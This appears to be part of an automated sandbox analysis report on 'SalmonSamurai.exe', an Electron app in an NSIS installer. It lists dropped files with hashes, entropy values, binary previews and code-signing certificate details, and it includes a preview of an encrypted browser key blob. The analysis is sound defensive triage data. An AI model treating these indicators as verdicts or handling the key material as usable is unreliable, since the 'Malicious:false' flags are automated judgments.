                                                                                                                                                                                                                                          SHA1:FF787FB0156C40478D778B2A6856AD7B469BD7CB
                                                                                                                                                                                                                                          SHA-256:6D6D095A1B39C38C273BE35CD09EB1914BD3A53F05180A3B3EB41A81AE31D5D3
                                                                                                                                                                                                                                          SHA-512:BE2D8FBEDAA957F0C0823E7BEB80DE570EDD0B8E7599CF8F2991DC671BDCBBBE618C15B36705D83BE7B6E9A0D32EC00F519FC8543B548422CA8DCF07C0548AB4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1043803
                                                                                                                                                                                                                                          Entropy (8bit):4.044068430611977
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:LXNxfy+orMVjLn1ExBlhfg5yzntRMcA2i:rffyrrMFL1cB3g5yzMcA2i
                                                                                                                                                                                                                                          MD5:7006691481966109CCE413F48A349FF2
                                                                                                                                                                                                                                          SHA1:6BD243D753CF66074359ABE28CFAE75BCEDD2D23
                                                                                                                                                                                                                                          SHA-256:24EA4028DA66A293A43D27102012235198F42A1E271FE568C7FD78490A3EE647
                                                                                                                                                                                                                                          SHA-512:E12C0D1792A28BF4885E77185C2A0C5386438F142275B8F77317EB8A5CEE994B3241BB264D9502D60BFBCE9CF8B3B9F605C798D67819259F501719D054083BEA
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):965006
                                                                                                                                                                                                                                          Entropy (8bit):4.295544641165274
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:wM9fKUyABW3p1F9SviTlw2cfgvNFOJgr/p54JVQJMwKpaJC28+58XoX0Doq9OyUk:wM9fKU6225jM9h
                                                                                                                                                                                                                                          MD5:F809BF5184935C74C8E7086D34EA306C
                                                                                                                                                                                                                                          SHA1:709AB3DECFF033CF2FA433ECC5892A7AC2E3752E
                                                                                                                                                                                                                                          SHA-256:9BBFA7A9F2116281BF0AF1E8FFB279D1AA97AC3ED9EBC80C3ADE19E922D7E2D4
                                                                                                                                                                                                                                          SHA-512:DE4B14DD6018FDBDF5033ABDA4DA2CB9F5FCF26493788E35D88C07A538B84FDD663EE20255DFD9C1AAC201F0CCE846050D2925C55BF42D4029CB78B057930ACD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):811437
                                                                                                                                                                                                                                          Entropy (8bit):4.342029978594925
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:1Jf31Mkgs3s5UWgHLRflsjj8cKGXdlogG0EeuLADh7Kle9dKj753ohP09XAyFHyJ:1Qzt5/5l
                                                                                                                                                                                                                                          MD5:2C41616DFE7FCDB4913CFAFE5D097F95
                                                                                                                                                                                                                                          SHA1:CF7D9E8AD3AA47D683E47F116528C0E4A9A159B0
                                                                                                                                                                                                                                          SHA-256:F11041C48831C93AA11BBF885D330739A33A42DB211DACCF80192668E2186ED3
                                                                                                                                                                                                                                          SHA-512:97329717E11BC63456C56022A7B7F5DA730DA133E3FC7B2CC660D63A955B1A639C556B857C039A004F92E5F35BE61BF33C035155BE0A361E3CD6D87B549DF811
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):411446
                                                                                                                                                                                                                                          Entropy (8bit):5.6133974766805546
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:y1MAG26Pl1kY1bkQq/7I5NsA7WGgeh5X/0+gi1ZavXEAQwiBvVGI:9j2Yle66s5775X/R
                                                                                                                                                                                                                                          MD5:3A858619502C68D5F7DE599060F96DB9
                                                                                                                                                                                                                                          SHA1:80A66D9B5F1E04CDA19493FFC4A2F070200E0B62
                                                                                                                                                                                                                                          SHA-256:D81F28F69DA0036F9D77242B2A58B4A76F0D5C54B3E26EE96872AC54D7ABB841
                                                                                                                                                                                                                                          SHA-512:39A7EC0DFE62BCB3F69CE40100E952517B5123F70C70B77B4C9BE3D98296772F10D3083276BC43E1DB66ED4D9BFA385A458E829CA2A7D570825D7A69E8FBB5F4
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):705061
                                                                                                                                                                                                                                          Entropy (8bit):4.868598768447113
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:wrccq9nty/KiDswU1nbx05kB3IjUUmEg5KuoLNiXElqnOyh:HGX35EEK
                                                                                                                                                                                                                                          MD5:EE70E9F3557B9C8C67BFB8DFCB51384D
                                                                                                                                                                                                                                          SHA1:FC4DFC35CDE1A00F97EEFE5E0A2B9B9C0149751E
                                                                                                                                                                                                                                          SHA-256:54324671A161F6D67C790BFD29349DB2E2D21F5012DC97E891F8F5268BDF7E22
                                                                                                                                                                                                                                          SHA-512:F4E1DA71CB0485851E8EBCD5D5CF971961737AD238353453DB938B4A82A68A6BBAF3DE7553F0FF1F915A0E6640A3E54F5368D9154B0A4AD38E439F5808C05B9F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):617109
                                                                                                                                                                                                                                          Entropy (8bit):5.143761316646653
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:LbeI8PzGSEiyqkAXsA5rzTExbWW7mQYrjuUco/9NjjFpvIx:LbDwz5qWK
                                                                                                                                                                                                                                          MD5:FF0A23974AEF88AFC86ECC806DBF1D60
                                                                                                                                                                                                                                          SHA1:E7BAE97CBB8692A0D106644DFAA9B7D7EA6FCEF0
                                                                                                                                                                                                                                          SHA-256:F245AB242AAFEEF37DB736C780476534FAD0706AA66DCB8B6B8CD181B4778385
                                                                                                                                                                                                                                          SHA-512:AABE8160FAC7E0EB8E8EB80963FE995FA4A802147D1B8F605BC0FE3F8E2474463C1D313471C11C85EB5578112232FDC8E89B8A6D43DBE38A328538FF30A78D08
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):488196
                                                                                                                                                                                                                                          Entropy (8bit):5.7988900625034185
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:gzLBn6cDgszBm0JXbwS1LcxzIJj758+UIi0+UELbzi830l:gpdDgsz00JrwSNizS5Hti0+UUvi830l
                                                                                                                                                                                                                                          MD5:3FE6F90F1F990AED508DEDA3810CE8C2
                                                                                                                                                                                                                                          SHA1:3B86F00666D55E984B4ACA1A5E8319FFA8F411FF
                                                                                                                                                                                                                                          SHA-256:5EEBB23221AEBCF0BE01BFC2695F7DD35B17F6769BE1E28E5610D35C9717854B
                                                                                                                                                                                                                                          SHA-512:9AA9D55F112C8B32AA636086CFD2161D97EA313CAC1A44101014128124A03504C992AC8EFD265ABA4E91787AEF7134A14507A600F5EC96FF82DF950A8883828C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):354097
                                                                                                                                                                                                                                          Entropy (8bit):6.680890808929274
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:gchsAAfyrtJw99jEaZx79+vKK4/+kTme5zBNCJ7GAmlv:gAAfyrtJAoaZ+vKK4/ye5zBNCJ7C
                                                                                                                                                                                                                                          MD5:20F315D38E3B2EDC5832931E7770B62A
                                                                                                                                                                                                                                          SHA1:2390BD585DEC1E884873454BB98B6F1467DCF7BB
                                                                                                                                                                                                                                          SHA-256:53A803724BBF2E7F40AAB860325C348F786EECA1EA5CA39A76B4C4A616E3233F
                                                                                                                                                                                                                                          SHA-512:C338E241DE3561707C7C275B7D6E0FB16185A8CD7112057C08B74FFCE122148EF693FE310C839FF93F102726A78E61DE3E68C8E324F445A07A98EE9C4FDD4E13
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):350032
                                                                                                                                                                                                                                          Entropy (8bit):6.69437398216595
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:BiwxICJkrCU2JLuRyMD+4qz5MHzCtMkZ/9ybT1:BiyS0pMD+4qz5MHzd6/o
                                                                                                                                                                                                                                          MD5:524711882CBFB5B95A63EF48F884CFF0
                                                                                                                                                                                                                                          SHA1:1078037687CFC5D038EEB8B63D295239E0EDC47A
                                                                                                                                                                                                                                          SHA-256:9E16499CD96A155D410C8DF4C812C52FF2A750F8C4DB87FD891C1E58C1428C78
                                                                                                                                                                                                                                          SHA-512:16D45A81F7F4606EDA9D12A8B1DA06E3C866B11BDC0C92A4022BFB8D02B885D8F028457CF23E3F7589DFD191ED7F7FBC68C81B6E1411834EDFCBC9CC85E0DC4D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):5245458
                                                                                                                                                                                                                                          Entropy (8bit):7.995476669559971
                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                          SSDEEP:98304:HLYxfQVcnNWz49PDq2AwpmqdhBh1Dd42cjrwrbHw4o0DPelwG3RC:H0pQGcMButuBhpd4jkrU4oeelrRC
                                                                                                                                                                                                                                          MD5:7D5065ECBA284ED704040FCA1C821922
                                                                                                                                                                                                                                          SHA1:095FCC890154A52AD1998B4B1E318F99B3E5D6B8
                                                                                                                                                                                                                                          SHA-256:A10C3D236246E001CB9D434A65FC3E8AA7ACDDDDD9608008DB5C5C73DEE0BA1F
                                                                                                                                                                                                                                          SHA-512:521B2266E3257ADAA775014F77B0D512FF91B087C2572359D68FFE633B57A423227E3D5AF8EE4494538F1D09AA45FFA1FE8E979814178512C37F7088DDD7995D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):8623182
                                                                                                                                                                                                                                          Entropy (8bit):5.556347118206602
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:Hn9CyBK3UK9tUv3UuAdFUnBUecSHNXC4215nL2S26L82ELcAJvsvRRvy4vS716DT:HyUkmE
                                                                                                                                                                                                                                          MD5:2DB47AF7467164D1BB58AF47DC46F6CD
                                                                                                                                                                                                                                          SHA1:AA4B3F342F7DFBC01ABE53D777508C486F589446
                                                                                                                                                                                                                                          SHA-256:5FC547A0A658287F101970D3882CE47F8D35735AE0E227B507503A3D9764F358
                                                                                                                                                                                                                                          SHA-512:05B8DB2BC8C1BC6EB17A3B8EAFCA9F3F0E2DB21B79BADF520C2208D60071B081EDA96BA0285C6770E1E51E67A1E116773617B8115901E0B99BACBC9B2D96516D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:....L+..H+..C+..{"files":{"node_modules":{"files":{"@isaacs":{"files":{"cliui":{"files":{"LICENSE.txt":{"size":731,"integrity":{"algorithm":"SHA256","hash":"2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149","blockSize":4194304,"blocks":["2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149"]},"offset":"0"},"build":{"files":{"index.cjs":{"size":10398,"integrity":{"algorithm":"SHA256","hash":"820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607","blockSize":4194304,"blocks":["820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607"]},"offset":"731"},"index.d.cts":{"size":1050,"integrity":{"algorithm":"SHA256","hash":"385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b","blockSize":4194304,"blocks":["385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b"]},"offset":"11129"},"lib":{"files":{"index.js":{"size":10100,"integrity":{"algorithm":"SHA256","hash":"e67b3446f47d4a672339c99bea9e987979da9fc70f421701814cb9d52ba176
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):107520
                                                                                                                                                                                                                                          Entropy (8bit):6.442687067441468
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                                                                                                                                                                          MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                                                                                          SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                                                                                          SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                                                                                          SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):273328
                                                                                                                                                                                                                                          Entropy (8bit):3.2521181832662194
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:MpeVehd7eASb6iAGm4hmWRSJTnBSki+TfUNp2Zg+TEJ0xEI2tWaw8MCZ72T04GO9:YdyNm4mWRSJTBSXsU1vJzbYB
                                                                                                                                                                                                                                          MD5:8915DD2A6D6B4EBF9A16C77FE063D8DE
                                                                                                                                                                                                                                          SHA1:A03132ADCB99A82BA269D56AB6577CCFD1BB08E5
                                                                                                                                                                                                                                          SHA-256:C1802B29B13663A8890031411270866834246931F71F41397682DD88FA16D485
                                                                                                                                                                                                                                          SHA-512:ABD93CDD634AD4D38B7E3714B183335CDDB9E3AD14660247CC7285066C95342AC8595D68CD0868B8512E73BB656AB54386045533F998576B2CD6501BF456CD2C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:............11.2.214.9-electron.0............................................;...b...........:..a........a........a........ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):588152
                                                                                                                                                                                                                                          Entropy (8bit):4.83735352889622
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:bFzofuYUahtcOm3A0Tg8zY8y4XrxXSIIBYgHi:JMfu/fTY8zrM9C7
                                                                                                                                                                                                                                          MD5:4CD37EA771EA4FE2F3AD46217CC02206
                                                                                                                                                                                                                                          SHA1:31680E26869B007E62550E96DBF846B3980D5B2B
                                                                                                                                                                                                                                          SHA-256:95F7B8664306DA8D0073A795E86590ED6FDAEDE5F489132E56C8779F53CF1ED5
                                                                                                                                                                                                                                          SHA-512:E1369734CBE17AAF6DD3CEEFB57F056C5A9346D2887A7D3EE7ED177386D7F5E624407869D53902B56AB350E4DED5612C3B0F52C2DD3EFA307E9947701068A2A0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.........c~.11.2.214.9-electron.0...........................................H...P<..........X...........a........a........aT.......ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):5334528
                                                                                                                                                                                                                                          Entropy (8bit):6.335261874351837
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:98304:RKJSTu+985EkjstvgsnpkkHF3y/AFIB7:RQq85EkjstvgsnpkkJETB
                                                                                                                                                                                                                                          MD5:524B0D85D992F86A7F26C162F3DBB91C
                                                                                                                                                                                                                                          SHA1:BC9C862FD01F6134A0514DCB63F9FAB7A61CE269
                                                                                                                                                                                                                                          SHA-256:5B2FFB78FA963F2DEA5A7FCF7676FC3ABA243C4372D7528C8F1FC8F726D0A3FA
                                                                                                                                                                                                                                          SHA-512:422A18AF294D7551224E05F5F4F5DCFA51B3455C2E61FC285FD2B95B50274EB77FF317647E17B0E7D47459B4FED19C7C88C90E0878F2269A78D598B1196401D8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......A..........;.......................................R...........`A..........................................L.~...&.L.P....`R.......P.<_...........pR.X}...L.......................L.(...@.A.@.............L.P............................text.....A.......A................. ..`.rdata...(....A..*....A.............@..@.data...p.....M.......M.............@....pdata..<_....P..`...LO.............@..@.00cfg..8.....Q.......P.............@..@.gxfg....,....R.......P.............@..@.retplne.....0R.......P..................tls....Q....@R.......P.............@..._RDATA..\....PR.......P.............@..@.rsrc........`R.......P.............@..@.reloc..X}...pR..~....P.............@..B................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):106
                                                                                                                                                                                                                                          Entropy (8bit):4.724752649036734
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                                                                                          MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                                                                          SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                                                                          SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                                                                          SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):928256
                                                                                                                                                                                                                                          Entropy (8bit):6.558092096809165
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24576:IEW7F7IyaHx/fempu2e6Z5WODYsHh6g3P0zAk7o:e7IyaBfempa6Z5WODYsHh6g3P0zAk7
                                                                                                                                                                                                                                          MD5:6D4ADF9A48DBCE2E480EF10B1338CA3C
                                                                                                                                                                                                                                          SHA1:CEB77D5768C6EDA84EC8E0B43821B8027764DE81
                                                                                                                                                                                                                                          SHA-256:4CCA7E6C05B2D988926E4B4D0C8FF91D6356F18DE8BF40B440251180E5CAD6A7
                                                                                                                                                                                                                                          SHA-512:106DB7309B40AFABB1CCA911B204C83129683DC116AEC198568C4228C581BF0DE5963BFFC0B50DF8F43EC355264F271FC383F4155BE45350C0D7DD429C7F7F09
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......................................................................`A........................................H...<!......P...............<o..............T...t.......................X...(...@...@............................................text............................... ..`.rdata..............................@..@.data....L...p... ...V..............@....pdata..<o.......p...v..............@..@.00cfg..8....0......................@..@.gxfg...P(...@...*..................@..@.retplne.....p...........................tls................................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..T...........................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):389
                                                                                                                                                                                                                                          Entropy (8bit):5.669082967626313
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:YKWSg99rrt+s5fjfStzluBJTSQ5hRnL4vmy0xY:YKWfrrtz5fjfSCvT35hRLemy4Y
                                                                                                                                                                                                                                          MD5:4074AB5C25B53B8554C09B833158A791
                                                                                                                                                                                                                                          SHA1:78937E64D886192C815F8D946BCCDC34C15A26AC
                                                                                                                                                                                                                                          SHA-256:C9B2450CAE425900E9989F9BAC5817E88DC66CA1192D8EAC7F0E5174BC00190E
                                                                                                                                                                                                                                          SHA-512:9020BFBCDA5AFF23A49D2CB6F198A0F56DCF1B7CAE4634EDF46A088041ED7127D2D9B2BE4DC67C1AB6FC73BB5F673AA78D8D318E4AA09A812C3CCD2E05B18373
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACMtjONeD74TY38J1prqXoNAAAAAAIAAAAAABBmAAAAAQAAIAAAAGa9UsdMNhDC5WHVBW39XsItp1wvDreEnUksCrEWizuUAAAAAA6AAAAAAgAAIAAAAG6VHELLUdl4t3RvqI12SIzjbjOhQ7WQLnYUe9KuOTWDMAAAAMOg5CwbBHMeY8cZDCxD2xOoma/UpriRN3t3gStyZadoIjhmPKIqQWP7KqvwN2B59kAAAADjPec7uTIt+B2MvBbUxi457iHx3X54SOfKVi991xzWGOb3N0n8LsSl9wk7qvaIc3NneniefWGNFa5XLztnHTJm"}}
                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                          Entropy (8bit):7.999986641840123
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:SalmonSamurai.exe
                                                                                                                                                                                                                                          File size:74'023'200 bytes
                                                                                                                                                                                                                                          MD5:4ce4a1f912d0b9840a7f568454c6c45a
                                                                                                                                                                                                                                          SHA1:bbf41f3dee85e038f1cb4965269bb0f06b3bb27a
                                                                                                                                                                                                                                          SHA256:83679dfd6331a0a0d829c0f3aed5112b69a7024ff1ceebf7179ba5c2b4d21fc5
                                                                                                                                                                                                                                          SHA512:1583c31d11bf6d89e801398094222b6600cb610cffaed714e95415e887d31091dff0a386cec67ec0b23d519f5a662d899eb51533aff7327fbe7284573a904d2a
                                                                                                                                                                                                                                          SSDEEP:1572864:FQUvSCC8EhkQ2eCwxbjOcs1ecd3vXqL/PI2FS/oah2O:F54FhAsO11ec5yL/N0oah2O
                                                                                                                                                                                                                                          TLSH:8FF73366AFBD64C1F87330F5054A3993FB1A1B574B09EA3588F8BD9B049899C4F81E13
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................h...".....
                                                                                                                                                                                                                                          Icon Hash:adaeb397f36b6331
                                                                                                                                                                                                                                          Entrypoint:0x403665
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x660843F7 [Sat Mar 30 16:55:19 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                                                                                                                                                                                          Signature Valid:true
                                                                                                                                                                                                                                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                          Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                          Error Number:0
                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                          • 14/12/2024 08:21:02 06/12/2025 09:00:54
                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                          • CN=ELEFAR LLC, O=ELEFAR LLC, STREET="ul Polyany, 5A / korpus 1 pomeshch 7n", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1217700082577, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                          Thumbprint MD5:3339AD8CCE8923C682D0E416361BF47B
                                                                                                                                                                                                                                          Thumbprint SHA-1:901F3FE4E599CD155132CE2B6BF3C5F6D1E0387C
                                                                                                                                                                                                                                          Thumbprint SHA-256:043C75759AB9230C929F661168CA533CC92EDF88D480EAFF3DCEB04C6BFC6AC4
                                                                                                                                                                                                                                          Serial:301385AA36FAE635E74BB88E
                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          sub esp, 000003F8h
                                                                                                                                                                                                                                          push ebp
